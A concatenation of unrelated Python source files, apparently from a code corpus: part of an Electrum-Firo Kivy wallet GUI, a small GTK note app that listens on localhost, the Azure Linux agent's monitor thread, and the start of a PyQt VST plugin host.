'ps-not-enough-sm-denoms',
'ps-other-coins-arrived',
'ps-wfl-changes',
'ps-keypairs-changes',
'ps-state-changes'])
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
        # The main view of the activity might not have focus,
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
balance_sat = c + u + x
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self, is_ps=False):
from electrum_firo.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
min_rounds = None if not is_ps else self.wallet.psman.mix_rounds
include_ps = (min_rounds is None)
inputs = self.wallet.get_spendable_coins(None,
include_ps=include_ps,
min_rounds=min_rounds)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs,
min_rounds=min_rounds)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in duffs/kB
return format_fee_satoshis(fee_rate) + ' sat/kB'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Firo Electrum', message,
app_icon=icon, app_name='Firo Electrum')
except ImportError:
            self.logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
@property
def testnet(self):
return self.electrum_config.get('testnet')
@property
def app_icon(self):
return ATLAS_ICON % ('logo-testnet' if self.testnet else 'logo')
def ps_icon(self, active=False, is_waiting=False):
if not active:
icon = 'privatesend'
elif not is_waiting:
icon = 'privatesend_active'
else:
icon = 'privatesend_waiting'
return ATLAS_ICON % icon
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, pr, on_complete):
status = False
if pr and pr.has_expired():
self.send_screen.payment_request = None
status, msg = False, _("Invoice has expired")
Clock.schedule_once(lambda dt: on_complete(status, msg))
return
need_broadcast = True if not pr or pr.need_broadcast_tx else False
txid = tx.txid()
try:
if need_broadcast:
coro = self.wallet.psman.broadcast_transaction(tx)
self.network.run_from_another_thread(coro)
else:
self.logger.info(f'Do not broadcast: {txid}, send bip70'
f' Payment msg to: {pr.payment_url}')
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except PSPossibleDoubleSpendError as e:
msg = str(e)
except PSSpendToPSAddressesError as e:
msg = str(e)
except BestEffortRequestFailed as e:
msg = repr(e)
else:
if pr:
self.send_screen.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
if need_broadcast:
status, msg = True, txid
else:
status, msg = ack_status, ack_msg
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, pr, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') +
':\n' + _('Electrum network not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
is_ps = getattr(screen, 'is_ps', None)
def amount_cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
if is_ps is None:
popup = AmountDialog(show_max, amount, cb=amount_cb)
else:
popup = AmountDialog(show_max, amount, is_ps=is_ps, cb=amount_cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
else:
self._addresses_dialog.update()
self._addresses_dialog.open()
def coins_dialog(self, filter_val=0):
from .uix.dialogs.coins_dialog import CoinsDialog
popup = CoinsDialog(self, filter_val=filter_val)
popup.update()
popup.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args, on_failure=None):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: on_failure(*args) if on_failure else None)
d.open()
else:
def q_callback(b):
if b:
f(*args, self.password)
elif on_failure:
on_failure(*args)
d = Question(
msg,
q_callback,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
backup_dir = util.android_backup_dir()
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def set_top_progress(self, value):
if 'top_prog_bar' in self.root.ids:
self.root.ids.top_prog_bar.value = value
def get_top_progress(self):
if 'top_prog_bar' in self.root.ids:
return self.root.ids.top_prog_bar.value
else:
return 100
def on_mn_list_updated(self, event, *args):
self._trigger_update_readiness()
def update_readiness(self, dt):
if self.get_top_progress() >= 100:
return
if self.network:
readiness = self.network.network_data_readiness()
else:
readiness = 0
self.set_top_progress(readiness)
|
note.py
|
#!/bin/python
from threading import Thread
import socket
import sys
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import GLib
from gi.repository import Gtk
from gi.repository import Gdk
PORT = 12347
HOST = "127.0.0.1"
def start_server(w):
def show_all(w):
w.show_all()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen()
    try:
        while True:
            try:
                conn, addr = s.accept()
                # wait for the client to send or close, then release the connection
                data = conn.recv(1024)
                conn.close()
                GLib.idle_add(show_all, w)
            except socket.error:
                continue
    except KeyboardInterrupt:
        s.close()
def check_already_running() -> bool:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((HOST, PORT))
return True
except Exception as e:
return False
def main():
def gui() -> Gtk.Window:
def quit(_w):
Gtk.main_quit()
def hide(win, ev):
keyname = Gdk.keyval_name(ev.keyval)
if keyname == "Escape":
win.hide()
t = Gtk.TextView()
w = Gtk.Window()
w.maximize()
w.add(t)
w.connect("destroy", quit)
w.connect("key-press-event", hide)
w.show_all()
return w
def style():
css = b'''
textview text {
background-color: #eafba1;
}
textview {
font-size: 28px;
}
'''
css_provider = Gtk.CssProvider()
css_provider.load_from_data(css)
context = Gtk.StyleContext()
screen = Gdk.Screen.get_default()
context.add_provider_for_screen(
screen, css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
def start_server_or_exit(window) -> bool:
if check_already_running():
sys.exit()
else:
server = Thread(target=start_server, args=(window,))
server.start()
window = gui()
start_server_or_exit(window)
style()
Gtk.main()
if __name__ == "__main__":
main()
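# Rough usage sketch (not part of the original script): because start_server()
# calls GLib.idle_add(show_all, w) for every accepted connection, any other
# process can re-raise the hidden note window simply by connecting to
# (HOST, PORT), for example:
#
#   import socket
#   with socket.create_connection((HOST, PORT)) as s:
#       s.sendall(b"show")  # payload is ignored; the connection itself triggers show_all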
|
monitor.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import threading
import uuid
import azurelinuxagent.common.logger as logger
import azurelinuxagent.common.utils.networkutil as networkutil
from azurelinuxagent.common.cgroupconfigurator import CGroupConfigurator
from azurelinuxagent.common.cgroupstelemetry import CGroupsTelemetry
from azurelinuxagent.common.errorstate import ErrorState
from azurelinuxagent.common.event import add_event, WALAEventOperation, report_metric
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.osutil import get_osutil
from azurelinuxagent.common.protocol.healthservice import HealthService
from azurelinuxagent.common.protocol.imds import get_imds_client
from azurelinuxagent.common.protocol.util import get_protocol_util
from azurelinuxagent.common.utils.restutil import IOErrorCounter
from azurelinuxagent.common.utils.textutil import hash_strings
from azurelinuxagent.common.version import AGENT_NAME, CURRENT_VERSION
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_monitor_handler():
return MonitorHandler()
class PollResourceUsageOperation(PeriodicOperation):
"""
Periodic operation to poll the tracked cgroups for resource usage data.
It also checks whether there are processes in the agent's cgroup that should not be there.
"""
def __init__(self):
super(PollResourceUsageOperation, self).__init__(
name="poll resource usage",
operation=self._operation_impl,
period=datetime.timedelta(minutes=5))
self._last_error = None
self._error_count = 0
def _operation_impl(self):
#
# Check the processes in the agent cgroup
#
processes_check_error = None
try:
processes = CGroupConfigurator.get_instance().get_processes_in_agent_cgroup()
if processes is not None:
unexpected_processes = []
for (_, command_line) in processes:
if not CGroupConfigurator.is_agent_process(command_line):
unexpected_processes.append(command_line)
if unexpected_processes:
unexpected_processes.sort()
processes_check_error = "The agent's cgroup includes unexpected processes: {0}".format(ustr(unexpected_processes))
except Exception as exception:
processes_check_error = "Failed to check the processes in the agent's cgroup: {0}".format(ustr(exception))
# Report a small sample of errors
if processes_check_error != self._last_error and self._error_count < 5:
self._error_count += 1
self._last_error = processes_check_error
logger.info(processes_check_error)
add_event(op=WALAEventOperation.CGroupsDebug, message=processes_check_error)
#
# Report metrics
#
metrics = CGroupsTelemetry.poll_all_tracked()
for metric in metrics:
report_metric(metric.category, metric.counter, metric.instance, metric.value)
class ResetPeriodicLogMessagesOperation(PeriodicOperation):
"""
Periodic operation to clean up the hash-tables maintained by the loggers. For reference, please check
azurelinuxagent.common.logger.Logger and azurelinuxagent.common.event.EventLogger classes
"""
def __init__(self):
super(ResetPeriodicLogMessagesOperation, self).__init__(
name="reset periodic log messages",
operation=ResetPeriodicLogMessagesOperation._operation_impl,
period=datetime.timedelta(hours=12))
@staticmethod
def _operation_impl():
logger.reset_periodic()
class ReportNetworkErrorsOperation(PeriodicOperation):
def __init__(self):
super(ReportNetworkErrorsOperation, self).__init__(
name="report network errors",
operation=ReportNetworkErrorsOperation._operation_impl,
period=datetime.timedelta(minutes=30))
@staticmethod
def _operation_impl():
io_errors = IOErrorCounter.get_and_reset()
hostplugin_errors = io_errors.get("hostplugin")
protocol_errors = io_errors.get("protocol")
other_errors = io_errors.get("other")
if hostplugin_errors > 0 or protocol_errors > 0 or other_errors > 0:
msg = "hostplugin:{0};protocol:{1};other:{2}".format(hostplugin_errors, protocol_errors, other_errors)
add_event(op=WALAEventOperation.HttpErrors, message=msg)
class ReportNetworkConfigurationChangesOperation(PeriodicOperation):
"""
Periodic operation to check and log changes in network configuration.
"""
def __init__(self):
super(ReportNetworkConfigurationChangesOperation, self).__init__(
name="report network configuration changes",
operation=self._operation_impl,
period=datetime.timedelta(minutes=1))
self.osutil = get_osutil()
self.last_route_table_hash = b''
self.last_nic_state = {}
def _operation_impl(self):
raw_route_list = self.osutil.read_route_table()
digest = hash_strings(raw_route_list)
if digest != self.last_route_table_hash:
self.last_route_table_hash = digest
route_list = self.osutil.get_list_of_routes(raw_route_list)
logger.info("Route table: [{0}]".format(",".join(map(networkutil.RouteEntry.to_json, route_list))))
nic_state = self.osutil.get_nic_state()
if nic_state != self.last_nic_state:
description = "Initial" if self.last_nic_state == {} else "Updated"
logger.info("{0} NIC state: [{1}]".format(description, ", ".join(map(str, nic_state.values()))))
self.last_nic_state = nic_state
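# Illustrative sketch (not part of the agent): the operations above all follow the
# same pattern -- pass a name, a callable and a datetime.timedelta period to the
# PeriodicOperation base class, which MonitorHandler below runs from its daemon
# loop. A minimal custom operation written against only that constructor signature
# (the class name LogHeartbeatOperation is hypothetical) would look like:
#
#   class LogHeartbeatOperation(PeriodicOperation):
#       def __init__(self):
#           super(LogHeartbeatOperation, self).__init__(
#               name="log heartbeat",
#               operation=LogHeartbeatOperation._operation_impl,
#               period=datetime.timedelta(minutes=1))
#
#       @staticmethod
#       def _operation_impl():
#           logger.info("Monitor heartbeat")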
class MonitorHandler(ThreadHandlerInterface): # pylint: disable=R0902
# telemetry
EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
# host plugin
HOST_PLUGIN_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
HOST_PLUGIN_HEALTH_PERIOD = datetime.timedelta(minutes=5)
# imds
IMDS_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
IMDS_HEALTH_PERIOD = datetime.timedelta(minutes=3)
_THREAD_NAME = "MonitorHandler"
@staticmethod
def get_thread_name():
return MonitorHandler._THREAD_NAME
def __init__(self):
self.osutil = get_osutil()
self.imds_client = None
self.event_thread = None
self._periodic_operations = [
ResetPeriodicLogMessagesOperation(),
ReportNetworkErrorsOperation(),
PeriodicOperation("send_host_plugin_heartbeat", self.send_host_plugin_heartbeat, self.HOST_PLUGIN_HEARTBEAT_PERIOD),
PeriodicOperation("send_imds_heartbeat", self.send_imds_heartbeat, self.IMDS_HEARTBEAT_PERIOD),
ReportNetworkConfigurationChangesOperation(),
]
if CGroupConfigurator.get_instance().enabled():
self._periodic_operations.append(PollResourceUsageOperation())
self.protocol = None
self.protocol_util = None
self.health_service = None
self.should_run = True
self.heartbeat_id = str(uuid.uuid4()).upper()
self.host_plugin_errorstate = ErrorState(min_timedelta=MonitorHandler.HOST_PLUGIN_HEALTH_PERIOD)
self.imds_errorstate = ErrorState(min_timedelta=MonitorHandler.IMDS_HEALTH_PERIOD)
def run(self):
self.start()
def stop(self):
self.should_run = False
if self.is_alive():
self.join()
def join(self):
self.event_thread.join()
def stopped(self):
return not self.should_run
def init_protocols(self):
# The initialization of ProtocolUtil for the Monitor thread should be done within the thread itself rather
# than initializing it in the ExtHandler thread. This is done to avoid any concurrency issues as each
# thread would now have its own ProtocolUtil object as per the SingletonPerThread model.
self.protocol_util = get_protocol_util()
self.protocol = self.protocol_util.get_protocol()
self.health_service = HealthService(self.protocol.get_endpoint())
def init_imds_client(self):
wireserver_endpoint = self.protocol_util.get_wireserver_endpoint()
self.imds_client = get_imds_client(wireserver_endpoint)
def is_alive(self):
return self.event_thread is not None and self.event_thread.is_alive()
def start(self):
self.event_thread = threading.Thread(target=self.daemon)
self.event_thread.setDaemon(True)
self.event_thread.setName(self.get_thread_name())
self.event_thread.start()
def daemon(self):
try:
if self.protocol_util is None or self.protocol is None:
self.init_protocols()
if self.imds_client is None:
self.init_imds_client()
while not self.stopped():
try:
self.protocol.update_host_plugin_from_goal_state()
for op in self._periodic_operations: # pylint: disable=C0103
op.run()
except Exception as e: # pylint: disable=C0103
logger.error("An error occurred in the monitor thread main loop; will skip the current iteration.\n{0}", ustr(e))
finally:
PeriodicOperation.sleep_until_next_operation(self._periodic_operations)
except Exception as e: # pylint: disable=C0103
logger.error("An error occurred in the monitor thread; will exit the thread.\n{0}", ustr(e))
def send_imds_heartbeat(self):
"""
Send a health signal every IMDS_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have
successfully called and validated a response in the last IMDS_HEALTH_PERIOD.
"""
try:
is_currently_healthy, response = self.imds_client.validate()
if is_currently_healthy:
self.imds_errorstate.reset()
else:
self.imds_errorstate.incr()
is_healthy = self.imds_errorstate.is_triggered() is False
logger.verbose("IMDS health: {0} [{1}]", is_healthy, response)
self.health_service.report_imds_status(is_healthy, response)
except Exception as e: # pylint: disable=C0103
msg = "Exception sending imds heartbeat: {0}".format(ustr(e))
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.ImdsHeartbeat,
is_success=False,
message=msg,
log_event=False)
def send_host_plugin_heartbeat(self):
"""
Send a health signal every HOST_PLUGIN_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have been able to
communicate with HostGAPlugin at least once in the last HOST_PLUGIN_HEALTH_PERIOD.
"""
try:
host_plugin = self.protocol.client.get_host_plugin()
host_plugin.ensure_initialized()
is_currently_healthy = host_plugin.get_health()
if is_currently_healthy:
self.host_plugin_errorstate.reset()
else:
self.host_plugin_errorstate.incr()
is_healthy = self.host_plugin_errorstate.is_triggered() is False
logger.verbose("HostGAPlugin health: {0}", is_healthy)
self.health_service.report_host_plugin_heartbeat(is_healthy)
if not is_healthy:
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HostPluginHeartbeatExtended,
is_success=False,
message='{0} since successful heartbeat'.format(self.host_plugin_errorstate.fail_time),
log_event=False)
except Exception as e: # pylint: disable=C0103
msg = "Exception sending host plugin heartbeat: {0}".format(ustr(e))
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HostPluginHeartbeat,
is_success=False,
message=msg,
log_event=False)
|
main.py
|
#!python3
import os
import sys
from time import time, sleep
import json
import logging
import threading
from queue import Queue
from multiprocessing import Pipe, freeze_support, current_process
from PyQt5 import QtWidgets, QtCore, QtGui, uic
from neil_vst_gui.ui_logging import MainLogHandler, ProcessLogEmitter
from neil_vst_gui.ui_settings import UI_Settings
from neil_vst_gui.main_worker import MainWorker
from neil_vst_gui.job import Job
from neil_vst_gui.play_chain import PlayPluginChain
from neil_vst_gui.rects_animate import RectsAnimate
import neil_vst_gui.resources
import soundfile
__version__ = '0.5.7'
class VSTPluginWindow(QtWidgets.QWidget):
def __init__(self, plugin, parent=None):
super(VSTPluginWindow, self).__init__(parent)
#
self.setWindowFlags(self.windowFlags() | QtCore.Qt.Dialog)
# set self window name
self.setWindowTitle(plugin.name)
# set self size corresponding to plugin size
rect = plugin.edit_get_rect()
self.resize(rect["right"], rect["bottom"])
# open plugin GUI to self
plugin.edit_open(int(self.winId()), self.gui_callback)
self.plugin = plugin
def closeEvent(self, event):
self.plugin.edit_close(int(self.winId()))
self.plugin = None
event.accept()
def gui_callback(self, event_str, plugin_p, index, value, ptr, opt):
if event_str == "audioMasterSizeWindow":
rect = self.plugin.edit_get_rect()
self.resize(rect["right"], rect["bottom"])
class neil_vst_gui_window(QtWidgets.QMainWindow):
logging_signal = QtCore.pyqtSignal(str, str)
progress_signal = QtCore.pyqtSignal(int)
ready_signal = QtCore.pyqtSignal()
# constructor
def __init__(self):
super().__init__()
# Create the MainThread logging
self._logger_init()
# Init UI
self._ui_init()
self.job = Job()
self.main_worker = MainWorker(logger=self.logger)
self.play_chain = PlayPluginChain(blocksize=1024, buffersize=10, logger=self.logger)
self.play_chain.progress_signal.connect(self.play_progress_update)
self.play_chain.stop_signal.connect(self.play_stop_slot)
# ---- connect signals/slots
self.action_open_job.triggered.connect(self._job_open)
self.action_save_job.triggered.connect(self._job_save)
self.action_show_logger_window.triggered.connect(self.dockWidget.show)
self.action_exit.triggered.connect(self._close_request)
#
self.button_add_files.clicked.connect(self._files_open_click)
# self.button_remove_selected_files.clicked.connect(self._files_remove_selected)
self.button_remove_all_files.clicked.connect(self._files_remove_all)
self.tool_button_out_folder.clicked.connect(self._files_out_folder_click)
#
self.button_add_vst.clicked.connect(self._plugin_add_click)
self.button_change_vst.clicked.connect(self._plugin_change_click)
self.table_widget_processes.itemDoubleClicked.connect(self._plugin_change_click)
self.button_vst_up_in_chain.clicked.connect(self._plugin_up_click)
self.button_vst_down_in_chain.clicked.connect(self._plugin_down_click)
self.button_remove_selected_vst.clicked.connect(self._plugin_remove_selected_click)
